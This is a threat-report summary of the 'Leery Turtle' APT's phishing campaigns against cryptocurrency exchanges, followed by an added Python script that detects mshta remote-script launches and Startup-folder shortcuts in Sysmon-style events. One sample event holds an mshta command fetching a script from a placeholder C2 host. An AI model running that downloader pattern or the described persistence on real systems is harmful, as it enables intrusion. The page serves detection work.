Leery Turtle Threat Report

2020-05-06 Cyberstruggle

https://cyberstruggle.org/delta/LeeryTurtleThreatReport_05_20.pdf

Attachments

LeeryTurtleThreatReport_05_20.pdf (3 MB)


The Leery Turtle report profiles a financially motivated APT active since at least late 2017 against cryptocurrency exchange businesses worldwide. The group performs reconnaissance against technical and executive staff, sends decoy emails with benign attachments to identify likely openers, then uses spear-phishing that impersonates services such as Google Drive and OneDrive and spoofs coworker email identities. A typical attack delivers a password-protected PDF with an LNK shortcut disguised as the password file; the shortcut launches mshta to retrieve VBS payloads from attacker infrastructure, gather host information, and install persistence through a Startup-folder shortcut. The campaign relies on staged VBS downloaders, bit.ly redirection, server-side checks for MSHTA user agents, and C2 responses that deliver second-stage scripts.
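Two of the behaviours above, mshta.exe fetching a remote script and a shortcut being dropped into the Startup folder, are visible in endpoint telemetry. The following is an added example written for this page, not code from the report or from Cyberstruggle; it assumes Sysmon-style event fields and runs over constructed sample events.

```python
"""Added triage example (not from the Cyberstruggle report): scan
constructed Sysmon-style events for the execution chain the summary
describes: mshta.exe launched with a remote script URL, and a .lnk
written into a user's Startup folder. Field names are assumptions."""
import re

# Constructed sample events; the URL and paths are placeholders.
SAMPLE_EVENTS = [
    {"type": "process_create", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://c2.example.invalid/s1.vbs"},
    {"type": "process_create", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Users\alice\Desktop\local.hta"},
    {"type": "file_create", "image": r"C:\Windows\System32\wscript.exe",
     "target": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows"
               r"\Start Menu\Programs\Startup\update.lnk"},
    {"type": "process_create", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

# A URL or a UNC path on the mshta command line means a remote script.
REMOTE_ARG = re.compile(r"\bhttps?://|\\\\[^\\\s]+\\", re.IGNORECASE)
# A .lnk created directly under the per-user Startup folder.
STARTUP_LNK = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$",
                         re.IGNORECASE)

def classify(event):
    """Return a finding label for one event, or None if it is benign."""
    if event["type"] == "process_create":
        if (event["image"].lower().endswith("\\mshta.exe")
                and REMOTE_ARG.search(event["cmdline"])):
            return "mshta_remote_script"  # stage-1 downloader behaviour
    elif event["type"] == "file_create":
        if STARTUP_LNK.search(event["target"]):
            return "startup_folder_lnk"   # persistence via Startup shortcut
    return None

def triage(events):
    """Group suspicious events by finding label, skipping benign ones."""
    findings = {}
    for ev in events:
        label = classify(ev)
        if label:
            findings.setdefault(label, []).append(ev)
    return findings

if __name__ == "__main__":
    for label, hits in triage(SAMPLE_EVENTS).items():
        print(label, len(hits))
```

A local .hta run by mshta is deliberately not flagged here; the summary describes retrieval from attacker infrastructure, so only remote arguments are treated as the downloader stage.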

Indicators of Compromise

